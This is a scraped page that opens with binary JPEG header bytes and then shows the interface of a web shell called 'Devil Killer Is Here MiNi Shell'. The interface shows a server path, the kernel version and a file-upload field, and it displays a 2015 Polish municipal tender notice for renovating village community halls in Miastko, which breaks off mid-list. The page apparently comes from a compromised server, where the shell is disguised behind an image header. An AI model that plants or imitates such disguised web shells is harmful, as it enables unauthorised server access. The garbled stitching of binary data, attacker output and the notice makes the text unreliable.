JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150417/54453-N-2015.html

<p class="kh_header"><b>Miastko: Remont świetlic wiejskich w miejscowościach: Dolsko, Głodowo, Kamnica, Piaszczyna, Świerzenko, Świerzno, Trzcinno i remont Ośrodka Zdrowia w Wałdowie gm. Miastko, pow. bytowski, woj. pomorskie</b><br>
<b>Numer ogłoszenia: 54453 - 2015; data zamieszczenia: 17.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlic wiejskich w miejscowościach: Dolsko, Głodowo, Kamnica, Piaszczyna, Świerzenko, Świerzno, Trzcinno i remont Ośrodka Zdrowia w Wałdowie gm. Miastko, pow. bytowski, woj. pomorskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu remontu świetlic wiejskich w miejscowościach: Dolsko, Głodowo, Kamnica, Piaszczyna, Świerzenko, Świerzno, Trzcinno i remontu Ośrodka Zdrowia w Wałdowie.
Określenie przedmiotu zamówienia oraz wielkość w odniesieniu do świetlic w wymienionych miejscowościach zawarto w opisie części zamówienia stanowiących zadania 1-8..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.11.11.00-9, 45.22.35.00-1, 45.23.32.00-1, 45.26.25.20-2, 45.33.11.00-7, 45.33.00.00-9, 45.31.12.00-2, 45.41.00.00-4, 45.43.21.00-5, 45.32.10.00-3, 45.44.21.10-1, 45.44.30.00-4, 45.44.21.00-8, 45.42.11.31-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązku posiadania uprawnień (koncesji, zezwoleń, licencji) do wykonywania działalności gospodarczej w zakresie upoważniających wykonawcę do ubiegania się o udzielenie i realizację zamówienia będącego przedmiotem niniejszego postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku wykonawcy zobowiązani są do dysponowania odpowiednią wiedzą i doświadczeniem niezbędnym do wykonania zamówienia.
     Ocena spełnienia wymaganego warunku zostanie przeprowadzona w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu wyszczególnione w ogłoszeniu i odpowiednio w części 8.0. siwz, które wykonawca zobowiązany jest złożyć wraz z ofertą w celu potwierdzenia spełniania tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do dysponowania odpowiednim potencjałem technicznym niezbędnymi do wykonania zamówienia. 
Ocena spełnienia wymaganego warunku zostanie przeprowadzona w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu wyszczególnione w ogłoszeniu i odpowiednio w części 8.0. siwz, które wykonawca zobowiązany jest złożyć wraz z ofertą w celu potwierdzenia spełniania tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do dysponowania osobami zdolnymi  do wykonania zamówienia.
Ocena spełnienia wymaganego warunku zostanie przeprowadzona w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu wyszczególnione w ogłoszeniu  i odpowiednio w części 8.0. siwz, które wykonawca zobowiązany jest złożyć wraz z ofertą w celu potwierdzenia spełniania tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do posiadania dostępu lub dysponowania środkami finansowymi w wysokości zapewniającej wykonanie zamówienia.
Ocena spełnienia wymaganego warunku zostanie przeprowadzona w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu wyszczególnione w ogłoszeniu i odpowiednio w części 8.0. siwz, które wykonawca zobowiązany jest do złożenia wraz z ofertą w celu potwierdzenia spełniania tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. pełnomocnictwo osób/y uprawnionej do reprezentowania firmy, zgodnie z formą reprezentacji  Wykonawcy  określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy  organizacyjnej firmy  Wykonawcy o ile nie wynika to z innych dokumentów  załączonych do oferty; 
2. dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich (podpisany przez wszystkich wykonawców) - w formie oryginału, w przypadku wyboru oferty tych Wykonawców, Zamawiający przed zawarciem umowy ws. zamówienia publicznego będzie żądał umowę regulującą ich współpracę;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji na wykonane roboty - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnej zmiany postanowień umowy w stosunku do treści  oferty:
 1) przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie  będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest:      
a)wstrzymaniem robót przez zamawiającego w okolicznościach, za które wykonawca nie ponosi żadnej odpowiedzialności tj.  ze względu na potrzebę rozwiązania problemów technicznych, które mogą pojawić się w trakcie realizacji zamówienia w tym uzyskania opinii technicznej w zakresie określenia sposobu ich rozwiązania,
b)koniecznością dokonania zmian w dokumentacji projektowej na wniosek stron, jeżeli od ich wprowadzenia uzależnione jest dalsze prowadzenie robót - np. przeprojektowanie trasy przewodów c.o., lokalizacji kotła itp. w celu usunięcia ewentualnych kolizji ujawnionych na etapie wykonawstwa lub możliwości uzyskania wyższej sprawności instalacji grzewczej,
c)szczególnie niesprzyjającymi warunkami atmosferycznymi tj. silnymi lub ciągłymi opadami deszczu  wymuszającymi zabezpieczenie obiektu i wstrzymanie robót do czasu ich ustąpienia.
W przypadku wystąpienia którejkolwiek z okoliczności wskazanych w pkt 1 przedłużenie terminu wykonania umowy nastąpi o odpowiednio udokumentowany przez wykonawcę na piśmie okres trwania przesłanki,
 2) zamiany przewidzianych w ramach realizacji przedmiotu zamówienia materiałów i urządzeń na inne o takim samym przeznaczeniu o wyższych parametrach jakościowych i technicznych niż wynikające z siwz, pozwalających na osiągnięcie większego stopnia sprawności urządzeń bez zmiany ceny oferty</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miastko, ul. Grunwaldzka 1, 77-200 Miastko, pokój nr 17, Opłata za siwz 60 zł - dotyczy wersji papierowej przekazanej na wniosek wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2015 godzina 12:00, miejsce: Urząd Miejski w Miastku, ul. Grunwaldzka 1, 77-200 Miastko p. nr 19 ( I piętro - sekretariat burmistrza).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1  - świetlica Dolsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres planowanych robót 
1.1.remont schodów zewnętrznych przed wejściem:
-  rozbiórka schodów zewnętrznych o konstrukcji betonowej niezbrojonej - 0,91 m3;
-  wykonanie schodów zewnętrznych bet. wraz z  podestem - 0,91 m3;
- obłożenie schodów płytkami typu gres schodowymi antypoślizgowymi (ryflowanymi) - 3,17 m2;
- wywiezienie gruzu pochodzącego z rozbiórki;
1.2.	remont podłogi w budynku świetlicy: 
- zerwanie posadzki cementowej w korytarzu i  kuchni - 8,59 m2;
- rozebranie podłogi z desek na sali świetlicy -  56,26 m2 ;
- rozebranie legarów - 58,50 m;
- wykonanie posadzki cementowej - 64,85 m2;
- wykonanie izolacji przeciwwilgociowej z foli polietylenowej - 64,85 m2;
- wykonanie izolacji poziomej cieplnej z jednej warstwy płyt styropianowych gr. 8 cm  - 64,85 m2;
- wykonanie warstwy wyrównawczej gr. 7cm beton B-15 lub zaprawa cementowa M12 na siatce stalowej- 64,85 m2;
- położenie płytek posadzkowych typu gres  - 64,85 m2;
- wykonanie cokolików z płytek posadzkowych  - 50,88 m;
- wywiezienie gruzy pochodzącego z rozbiórki;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.11.11.00-9, 45.22.35.00-1, 45.23.32.00-1, 45.43.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2  - świetlica Głodowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót:
1.1. wykonanie izolacji przeciwwilgociowej ścian fundamentów (dwuwarstwowo lepikiem do murów otynkowanych  dyserbitem) - 17,60 m2;
1.2. docieplenie cokołu w technologii lekkiej - mokrej 8 cm warstwą styropianu  - 14,84 m2
1.3. docieplenie ścian zewnętrznych w technologii lekkiej - mokrej 12 cm warstwą styropianu fasadowego na klej i kołki montażowe z metalowymi bolcami (min. 4 szt/m2) wzmocnioną siatką z  włókna szklanego z wierzchnią warstwą kolorowego tynku strukturalnego cienkowarstwowego akrylowego koloru ceglastego - 69,28  m2  z wymianą parapetów z blachy powlekanej koloru brązowego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.44.21.10-1, 45.44.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3  - świetlica Kamnica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj i zakres planowanych robót: 
1.1.pokrycie dachu nad kotłownią świetlicy wiejskiej papą termozgrzewalną - 70,07 m2;
1.2.demontaż starych  rynien, rur spustowych i montaż nowych rynien z blachy stalowej ocynkowanej  powlekanej brązowej grubości 0,60 mm półokrągłych o średnicy 15 cm o długości 31,80 m i rur  spustowych okrągłych o średnicy 12 cm z blachy ocynkowanej powlekanej o grubości 0,50 mm o  długości 13,10 m; 
1.3.montaż 3 grzejników 2 płytowych o wymiarach 600x3000 wraz z zaworami odcinającymi 
i termostatycznymi;
1.4.malowanie sufitu o pow. 42,92 m2 w części gospodarczej wraz z wyrównaniem podłoża za pomocą gładzi gipsowej; 
1.5.malowanie ścian w części gospodarczej wraz z przygotowaniem podłoża o pow. 74,90 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.41.00.00-4, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4  - świetlica Piaszczyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót:
1.1.roboty murowe:
- rozbiórka ścian działowych o pow. 41,14 m2 i wykonanie nowych ścian działowych z betonu komórkowego ( suporeksu) o grubości 12 cm w pom. nr 4; 5 ; 6 o  pow. 25,64 m2 ;
- osadzenie kratek wentylacyjnych w ścianach - 2 szt.;
- montaż wentylatorów elektrycznych w pomieszczeniach sanitarnych - 2 szt.;
1.2.tynki i okładziny wewnętrzne:
 - wzmocnienie ścian za pomocą wklejenia prętów fi 6 w spoiny za pomocą zaprawy wraz z wymianą  uszkodzonych cegieł i uzupełnieniem tynków o  pow. 45 m2 w pom. nr 2; 3; 4; 5; 6; 7; 8;
- malowanie dwukrotne powierzchni wraz z przygotowaniem podłoża: 
a)ścian  o pow. 219,31  m2  (pom. 2; 3; 4; 5; 6; 7; 8);
b)sufitów  o pow. 47,424 m2  (pom.  2; 3; 4; 5; 6; 7; 8);  
- pokrywanie płytkami powierzchnie ścian w pom. 2; 3; 4; 5  -  pow. 40,67 m2 ;
1.3.roboty posadzkowe
- rozebranie posadzki z płytek w pom. 4; 5 ; 6 -  pow. 17,43m2 ;
- ułożenie na warstwie wyrównawczej płytek z zachowaniem istniejącego poziomu w pom. 4 ; 5 ; 6 -pow. 17,43m2 ;
1.4.roboty instalacyjne
- przełożenie instalacji elektrycznej wraz z jej uzupełnieniem w pom. 4 ; 5; 6  
- wykonanie instalacji przyzywowej dla osób niepełnosprawnej w pom. 5.;
 - wykonanie podejść wodno - kanalizacyjnych, montaż armatury łazienkowej wraz z montażem uchwytów dla niepełnosprawnych - (2 umywalki, 2 zlewozmywaki, 2 miski ustępowe, pisuar) ;
1.5.stolarka okienna i drzwiowa
- rozbiórka starej i montaż nowej stolarki drzwiowej w pom. 4; 5 - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.11.11.00-9, 45.23.32.00-1, 45.26.25.20-2, 45.33.00.00-9, 45.31.12.00-2, 45.41.00.00-4, 45.43.21.00-5, 45.44.21.10-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - świetlica Świerzenko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót:
1.1.  dwukrotne malowanie sufitu drewnianego o pow. 150 m2 wraz z malowaniem belek odciągowych 
1.2. wybicie drzwi w  ścianie i wstawienie drzwi wewnętrznych płytowych wraz z ościeżnicą 90;
1.3. uzupełnienie płytek w pomieszczeniu socjalnym wraz z cokolikiem - pow. 15 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.43.21.00-5, 45.42.11.21-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie  6  - świetlica Świerzno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót
1.1.remont schodów zewnętrznych przed wejściem głównym do świetlicy wiejskiej polegający na zbiciu starych płytek leżących na schodach, przygotowaniu powierzchni  i położeniu nowych płytek  typu gres antypoślizgowych (ryflowanych) o pow. 10 m2
1.2. oczyszczenie kamiennego fundamentu budynku od strony frontowej i powleczenie preparatem  impregnującym o pow. 2,0 m2;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.00-5, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na wykonane roboty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - świetlica Trzcinno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rodzaj i zakres  planowanych robót
1.1.roboty murowe:
-  rozbiórka ścianki działowej  -  9,60 m2;
 - wykonanie ścianki działowej z płyt kartonowo gipsowych -  3,60 m2;
 - osadzenie kratki wentylacyjnej - 1 szt.;
- wywiezienie gruzu z rozbiórki;
1.2. roboty posadzkowe
- ułożenie w korytarzu na warstwie wyrównawczej płytek typu gres antypoślizgowych - 0,4 m2 ;  
1.3. tynki i okładziny wewnętrzne
- dwukrotne malowanie powierzchni wraz z przygotowaniem podłoża ścian i sufitu o pow. 20,0 m2 ; 
- ułożenie płytek na ścianie i  podłodze - 17 m2;
1.4. roboty instalacyjne 
-  przełożenie przewodów instalacji elektrycznej elektrycznych - 10,00 m wraz z montażem 5 punktów elektrycznych;
- wykonanie podejścia  wodno - kanalizacyjnego wraz z montażem zlewozmywaka z baterią;
1.5. stolarka okienna i drzwiowa
- montaż okienka podawczego PCV;
- montaż drzwi wewnętrznych płytowych;.</p></li>
